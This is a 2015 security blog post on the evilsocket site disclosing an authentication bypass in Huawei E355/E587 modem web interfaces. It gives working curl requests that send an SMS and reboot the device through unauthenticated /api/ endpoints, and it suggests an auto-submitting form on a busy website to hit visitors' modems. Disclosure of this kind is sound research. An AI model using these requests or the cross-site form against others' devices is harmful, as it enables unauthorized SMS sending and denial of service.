<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta http-equiv="X-UA-Compatible" content="IE=edge">

<title>Huawei Modems Authentication Bypass | evilsocket</title>
<meta name="description" content="
I own a couple of Huawei USB modems, a Huawei E587 and a Huawei E355, while the first one is great for high speed mobile connections due to its dual channel fe">


  <link rel="alternate" href="/atom.xml" title="evilsocket" type="application/atom+xml">


<link rel="icon" href="/images/favicon.ico">

<!-- Open Graph -->
<meta property="og:type" content="article">
<meta property="og:title" content="Huawei Modems Authentication Bypass">
<meta property="og:description" content="
I own a couple of Huawei USB modems, a Huawei E587 and a Huawei E355, while the first one is great for high speed mobile connections due to its dual channel fe">
<meta property="og:url" content="/2015/02/01/Huawei-Modems-Authentication-Bypass/">
<meta property="og:site_name" content="evilsocket">

  
  
    <meta property="og:image" content="/images/2015/02/Huawei-Logo1422524173.jpg">
  


<!-- Twitter Card -->
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:title" content="Huawei Modems Authentication Bypass">
<meta name="twitter:description" content="
I own a couple of Huawei USB modems, a Huawei E587 and a Huawei E355, while the first one is great for high speed mobile connections due to its dual channel fe">

<!-- Schema.org JSON-LD -->


<script type="application/ld+json">
{"@context":"https://schema.org","@type":"Article","mainEntityOfPage":{"@type":"WebPage","@id":"https://www.evilsocket.net/2015/02/01/Huawei-Modems-Authentication-Bypass/"},"headline":"Huawei Modems Authentication Bypass","description":"I own a couple of Huawei USB modems, a Huawei E587 and a Huawei E355, while the first one is great for high speed mobile connections due to its dual channel fea","image":"https://www.evilsocket.net/images/2015/02/Huawei-Logo1422524173.jpg","datePublished":"2015-02-01T13:16:03.000Z","dateModified":"2015-02-01T13:41:22.000Z","author":{"@type":"Person","name":"Simone Margaritelli","description":"Italian cybersecurity researcher and open-source developer","url":"https://www.evilsocket.net","sameAs":["https://github.com/evilsocket","https://twitter.com/evilsocket","http://it.linkedin.com/in/simonemargaritelli/"],"jobTitle":"Security Researcher","worksFor":{"@type":"Organization","name":"Independent"}},"publisher":{"@type":"Organization","name":"evilsocket","url":"https://www.evilsocket.net","logo":{"@type":"ImageObject","url":"https://www.evilsocket.net/images/glider.png"}},"keywords":"hack, authentication, router, sms, huawei, modem, modems, e355, e587, bypass, reboot","articleSection":"Technology","inLanguage":"en"}
</script>


<!-- Fonts -->
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600;700&display=swap" rel="stylesheet">

<!-- Styles -->
<link rel="stylesheet" href="/css/style.css">


<!-- Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-22026549-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());
  gtag('config', 'UA-22026549-1');
</script>


<meta name="generator" content="Hexo 5.4.2"></head>
<body class="post-page">
  <header class="site-header">
  <div class="header-inner">
    <div class="site-branding">
      <a href="/" class="site-logo">
        
          <img src="/images/glider.png" alt="evilsocket" width="50" height="50">
        
        <span class="site-title">evilsocket</span>
      </a>
    </div>
    
    <nav class="site-nav">
      
        <a href="/" class="nav-link">
          HOME
        </a>
      
        <a href="/atom.xml" class="nav-link">
          RSS
        </a>
      
    </nav>
  </div>
</header>

  
  <main class="main-content">
    <article class="post-full">
  <header class="post-header">
    <h1 class="post-title">Huawei Modems Authentication Bypass</h1>
    <div class="post-meta">
      BY <span class="post-author">Simone Margaritelli</span>
      — <time datetime="2015-02-01T13:16:03.000Z">1 Feb 2015</time>
      
        — <a href="/tags/hack/" class="post-category">hack</a>, <a href="/tags/authentication/" class="post-category">authentication</a>, <a href="/tags/router/" class="post-category">router</a>, <a href="/tags/sms/" class="post-category">sms</a>, <a href="/tags/huawei/" class="post-category">huawei</a>, <a href="/tags/modem/" class="post-category">modem</a>, <a href="/tags/modems/" class="post-category">modems</a>, <a href="/tags/e355/" class="post-category">e355</a>, <a href="/tags/e587/" class="post-category">e587</a>, <a href="/tags/bypass/" class="post-category">bypass</a>, <a href="/tags/reboot/" class="post-category">reboot</a>
      
    </div>
  </header>

  
  
    <div class="post-cover">
      <img src="/images/2015/02/Huawei-Logo1422524173.jpg" alt="Huawei Modems Authentication Bypass">
    </div>
  

  <div class="post-content">
    <p><img src="/images/2015/02/Huawei-Logo1422524173.jpg" alt="huawei logo"></p>
<p>I own a couple of Huawei USB modems, a <strong>Huawei E587</strong> and a <strong>Huawei E355</strong>, while the first one is great for high speed mobile connections due to its dual channel feature, the E355 is a good choice for a small, easy to use and connect ( <strong>cdc_ether</strong> baby! ) mobile device.</p>
<p>But are they safe? … <strong>of course NOT</strong> :D</p>
<span id="more"></span>

<p>Many other researchers reported a <a target="_blank" rel="noopener" href="http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-275474.htm">few vulnerabilities</a> on some <a target="_blank" rel="noopener" href="http://www.exploit-db.com/exploits/19185/">specific devices</a>, but actually the same vulnerability, the authentication bypass, applies for every device having the Huawei <strong>WebUI</strong> if you use their API url instead of the specific html form of the device model itself.</p>
<p>Most of the html forms inside the web ui, which are “protected” by a username and passsword ( default admin:admin, change it! ), just perform an AJAX request to the <strong>real</strong> API url, for instance:</p>
<p><strong>/js/sms.js</strong> from E355 WebUI v11.011.04.00.625</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">....</span><br><span class="line">....</span><br><span class="line">saveAjaxData(<span class="string">&quot;api/sms/send-sms&quot;</span>, submitData, <span class="function"><span class="keyword">function</span>(<span class="params">$xml</span>) </span>&#123;</span><br><span class="line">    <span class="comment">//-------------------------------------------------------------------</span></span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">getSendSmsStatus</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">        getAjaxData(<span class="string">&quot;api/sms/send-status&quot;</span>, <span class="function"><span class="keyword">function</span>(<span class="params">$xml</span>) </span>&#123;</span><br><span class="line">            <span class="keyword">var</span> ret = xml2object($xml);</span><br><span class="line">            ret = ret.response;</span><br><span class="line">            <span class="keyword">var</span> sendTotalCount = ret.TotalCount;</span><br><span class="line">            <span class="keyword">var</span> currentSendIndex = ret.CurIndex;</span><br><span class="line">            <span class="keyword">var</span> currentSendPhone = ret.Phone;</span><br><span class="line">            <span class="keyword">var</span> sendSuccessPhones = ret.SucPhone;</span><br><span class="line">            <span class="keyword">var</span> sendFailPhones = ret.FailPhone;</span><br><span class="line">            <span class="keyword">var</span> statusContent = sms_hint_sending + <span class="string">&quot;&amp;nbsp;&quot;</span> + currentSendIndex + <span class="string">&quot;/&quot;</span> + sendTotalCount;</span><br><span class="line">....</span><br><span class="line">....</span><br></pre></td></tr></table></figure>

<p>As you might have already guessed, those urls which are all starting with <strong>/api/</strong> are not password protected whatsoever, for instance if you try the following (while you’re using your Huawei device and you have a SIM card in it):</p>
<pre><code>curl &quot;http://192.168.1.1/api/sms/send-sms&quot; --data &#39;&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;&lt;request&gt;&lt;Index&gt;-1&lt;/Index&gt;&lt;Phones&gt;&lt;Phone&gt;XXXXXXXXXX&lt;/Phone&gt;&lt;/Phones&gt;&lt;Sca&gt;&lt;/Sca&gt;&lt;Content&gt;test&lt;/Content&gt;&lt;Length&gt;4&lt;/Length&gt;&lt;Reserved&gt;1&lt;/Reserved&gt;&lt;Date&gt;2015-02-01 14:02:26&lt;/Date&gt;&lt;/request&gt;&#39;</code></pre>
<p>where XXXXXXXXXX would be your phone number, you’ll get a “test” sms from that device.</p>
<p>Or for instance, you could just reboot the device itself without being authenticated to it:</p>
<pre><code>curl &quot;http://192.168.1.1/api/device/control&quot; --data &#39;&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;&lt;request&gt;&lt;Control&gt;1&lt;/Control&gt;&lt;/request&gt;&#39;</code></pre>
<p>Imagine to put an auto-submit javascript-generated form inside an high traffic website :D</p>
<p><img src="/images/2015/02/bc39fd77b95c22fff332e8bf38ff78b52c88da48826447d3e7d37579740f2cf7.jpg" alt="evil laugh"></p>
<p>The firmware and webui are now for you to explore, you can find quite nice stuff in there if you know where to look at ;)</p>

  </div>

  
    <div class="post-tags">
      
        <a href="/tags/hack/" class="tag">#hack</a>
      
        <a href="/tags/authentication/" class="tag">#authentication</a>
      
        <a href="/tags/router/" class="tag">#router</a>
      
        <a href="/tags/sms/" class="tag">#sms</a>
      
        <a href="/tags/huawei/" class="tag">#huawei</a>
      
        <a href="/tags/modem/" class="tag">#modem</a>
      
        <a href="/tags/modems/" class="tag">#modems</a>
      
        <a href="/tags/e355/" class="tag">#e355</a>
      
        <a href="/tags/e587/" class="tag">#e587</a>
      
        <a href="/tags/bypass/" class="tag">#bypass</a>
      
        <a href="/tags/reboot/" class="tag">#reboot</a>
      
    </div>
  

  <nav class="post-navigation">
    
      <a href="/2015/02/11/Hackers-Phishing-Leakers-A-new-BitCoin-phishing-social-technique/" class="nav-prev">
        <span class="nav-label">PREVIOUS</span>
        <span class="nav-title">Hackers Phishing Leakers: A New BitCoin Phishing Social Technique.</span>
      </a>
    
    
      <a href="/2015/01/29/Nike-FuelBand-SE-BLE-Protocol-Reversed/" class="nav-next">
        <span class="nav-label">NEXT</span>
        <span class="nav-title">Nike+ FuelBand SE BLE Protocol Reversed</span>
      </a>
    
  </nav>
</article>


  


<section class="related-posts">
  <h3 class="related-title">YOU MIGHT ALSO LIKE...</h3>
  <div class="cards-grid cards-grid-related">
    
      

<article class="card card-light">
  <a href="/2023/11/02/Enumerate-Bruteforce-Attack-All-The-Things-Presenting-Legba/" class="card-link">
    
      <div class="card-image" style="background-image: url('https://upload.wikimedia.org/wikipedia/commons/thumb/7/77/VeveLegba.svg/800px-VeveLegba.svg.png')">
        
      </div>
    
    
    
      <div class="card-content">
        
          <span class="card-category">rust</span>
        
        <h2 class="card-title">Enumerate/Bruteforce/Attack All the Things! Presenting Legba</h2>
        
        <div class="card-footer">
          <span class="card-read-more">READ MORE</span>
        </div>
      </div>
    
  </a>
</article>

    
      

<article class="card card-overlay">
  <a href="/2016/10/09/IoCOFFEE-Reversing-the-Smarter-Coffee-IoT-machine-protocol-to-make-coffee-using-terminal/" class="card-link">
    
      <div class="card-image" style="background-image: url('/images/2016/10/terminal.png')">
        
          <div class="card-overlay-content">
            
              <span class="card-category">reversing</span>
            
            <h2 class="card-title">Reversing the Smarter Coffee IoT Machine Protocol to Make Coffee Using the Terminal.</h2>
            <span class="card-read-more">READ MORE</span>
          </div>
        
      </div>
    
    
    
  </a>
</article>

    
      

<article class="card card-overlay">
  <a href="/2016/01/18/Autopwn-every-Android-4-2-device-on-your-network-using-BetterCap-and-the-addJavascriptInterface-vulnerability/" class="card-link">
    
      <div class="card-image" style="background-image: url('/images/2016/01/hacked.jpg')">
        
          <div class="card-overlay-content">
            
              <span class="card-category">android</span>
            
            <h2 class="card-title">Autopwn Every Android &lt; 4.2 Device on Your Network Using BetterCap and the addJavascriptInterface Vulnerability.</h2>
            <span class="card-read-more">READ MORE</span>
          </div>
        
      </div>
    
    
    
  </a>
</article>

    
      

<article class="card card-light">
  <a href="/2015/07/27/How-to-use-old-GSM-protocols-encodings-to-know-if-a-user-is-Online-on-the-GSM-Network-AKA-PingSMS-2-0/" class="card-link">
    
      <div class="card-image" style="background-image: url('/images/default-cover.svg')">
        
      </div>
    
    
    
      <div class="card-content">
        
          <span class="card-category">gsm</span>
        
        <h2 class="card-title">How to Use Old GSM Protocols/encodings to Know if a User Is Online on the GSM Network AKA PingSMS 2.0</h2>
        
        <div class="card-footer">
          <span class="card-read-more">READ MORE</span>
        </div>
      </div>
    
  </a>
</article>

    
  </div>
</section>




  </main>
  
  <footer class="site-footer">
  <div class="footer-inner">
    <div class="footer-social">
      
        
          
            <a href="https://github.com/evilsocket" class="social-link" target="_blank" rel="noopener" aria-label="GitHub">
              <svg width="20" height="20" viewBox="0 0 24 24" fill="currentColor"><path d="M12 0c-6.626 0-12 5.373-12 12 0 5.302 3.438 9.8 8.207 11.387.599.111.793-.261.793-.577v-2.234c-3.338.726-4.033-1.416-4.033-1.416-.546-1.387-1.333-1.756-1.333-1.756-1.089-.745.083-.729.083-.729 1.205.084 1.839 1.237 1.839 1.237 1.07 1.834 2.807 1.304 3.492.997.107-.775.418-1.305.762-1.604-2.665-.305-5.467-1.334-5.467-5.931 0-1.311.469-2.381 1.236-3.221-.124-.303-.535-1.524.117-3.176 0 0 1.008-.322 3.301 1.23.957-.266 1.983-.399 3.003-.404 1.02.005 2.047.138 3.006.404 2.291-1.552 3.297-1.23 3.297-1.23.653 1.653.242 2.874.118 3.176.77.84 1.235 1.911 1.235 3.221 0 4.609-2.807 5.624-5.479 5.921.43.372.823 1.102.823 2.222v3.293c0 .319.192.694.801.576 4.765-1.589 8.199-6.086 8.199-11.386 0-6.627-5.373-12-12-12z"/></svg>
            </a>
          
        
          
            <a href="https://twitter.com/evilsocket" class="social-link" target="_blank" rel="noopener" aria-label="Twitter">
              <svg width="20" height="20" viewBox="0 0 24 24" fill="currentColor"><path d="M18.244 2.25h3.308l-7.227 8.26 8.502 11.24H16.17l-5.214-6.817L4.99 21.75H1.68l7.73-8.835L1.254 2.25H8.08l4.713 6.231zm-1.161 17.52h1.833L7.084 4.126H5.117z"/></svg>
            </a>
          
        
          
            <a href="http://it.linkedin.com/in/simonemargaritelli/" class="social-link" target="_blank" rel="noopener" aria-label="LinkedIn">
              <svg width="20" height="20" viewBox="0 0 24 24" fill="currentColor"><path d="M20.447 20.452h-3.554v-5.569c0-1.328-.027-3.037-1.852-3.037-1.853 0-2.136 1.445-2.136 2.939v5.667H9.351V9h3.414v1.561h.046c.477-.9 1.637-1.85 3.37-1.85 3.601 0 4.267 2.37 4.267 5.455v6.286zM5.337 7.433c-1.144 0-2.063-.926-2.063-2.065 0-1.138.92-2.063 2.063-2.063 1.14 0 2.064.925 2.064 2.063 0 1.139-.925 2.065-2.064 2.065zm1.782 13.019H3.555V9h3.564v11.452zM22.225 0H1.771C.792 0 0 .774 0 1.729v20.542C0 23.227.792 24 1.771 24h20.451C23.2 24 24 23.227 24 22.271V1.729C24 .774 23.2 0 22.222 0h.003z"/></svg>
            </a>
          
        
          
        
          
            <a href="mailto:evilsocket@gmail.com" class="social-link" aria-label="Email">
              <svg width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"><path d="M4 4h16c1.1 0 2 .9 2 2v12c0 1.1-.9 2-2 2H4c-1.1 0-2-.9-2-2V6c0-1.1.9-2 2-2z"/><polyline points="22,6 12,13 2,6"/></svg>
            </a>
          
        
      
    </div>
    <p class="footer-copyright">
      &copy; 2025 evilsocket. 
      Powered by <a href="https://hexo.io" target="_blank" rel="noopener">Hexo</a>.
    </p>
  </div>
</footer>

  <!-- Minimal JS - no external dependencies needed -->
<script>
  // Lazy load images
  document.addEventListener('DOMContentLoaded', function() {
    var images = document.querySelectorAll('.card-image[data-bg]');
    images.forEach(function(img) {
      img.style.backgroundImage = 'url(' + img.dataset.bg + ')';
    });
  });
</script>

</body>
</html>
